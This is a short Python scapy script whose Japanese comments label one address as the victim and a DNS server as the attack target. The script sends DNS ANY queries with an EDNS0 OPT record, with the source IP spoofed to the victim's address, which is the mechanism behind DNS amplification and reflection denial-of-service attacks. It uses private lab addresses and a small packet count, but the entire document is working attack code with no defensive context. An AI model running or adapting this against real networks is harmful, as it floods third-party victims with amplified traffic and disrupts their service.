from scapy.all import *
import random
import time

def send_spoofed_dns_any_edns0(victim_ip, dns_server_ip, qname, count=5, interval=1.0):
    print(f"[+] Sending {count} spoofed DNS ANY queries with EDNS0 for '{qname}' from {victim_ip} to {dns_server_ip}")

    for i in range(count):
        transaction_id = random.randint(1, 65535)
        sport = random.randint(1024, 65535)  # ランダムな高ポート（ephemeral port）

        # IP + UDPヘッダ
        ip = IP(src=victim_ip, dst=dns_server_ip)
        udp = UDP(sport=sport, dport=53)

        # DNSクエリ + EDNS0（OPT）レコード付き
        dns = DNS(
            id=transaction_id,
            rd=1,
            qd=DNSQR(qname=qname, qtype=255),  # qtype=255 → ANY
            ar=DNSRROPT(rclass=4096, rdlen=0)
        )

        pkt = ip / udp / dns

        print(f"[*] Sending packet {i+1}/{count} (TXID=0x{transaction_id:04x}, SPORT={sport})")
        send(pkt, verbose=0)
        time.sleep(interval)

# ====== 実行パラメータ ======
victim_ip = "192.168.11.100"       # 偽装された送信元IP（被害者）
dns_server_ip = "192.168.11.53"    # DNSサーバIP（攻撃対象）
domain = "takkesan.com"            # 問い合わせ対象ドメイン
send_count = 5                     # クエリ送信回数
send_interval = 0.5                # 送信間隔（秒）

# ====== 実行 ======
send_spoofed_dns_any_edns0(victim_ip, dns_server_ip, domain, count=send_count, interval=send_interval)

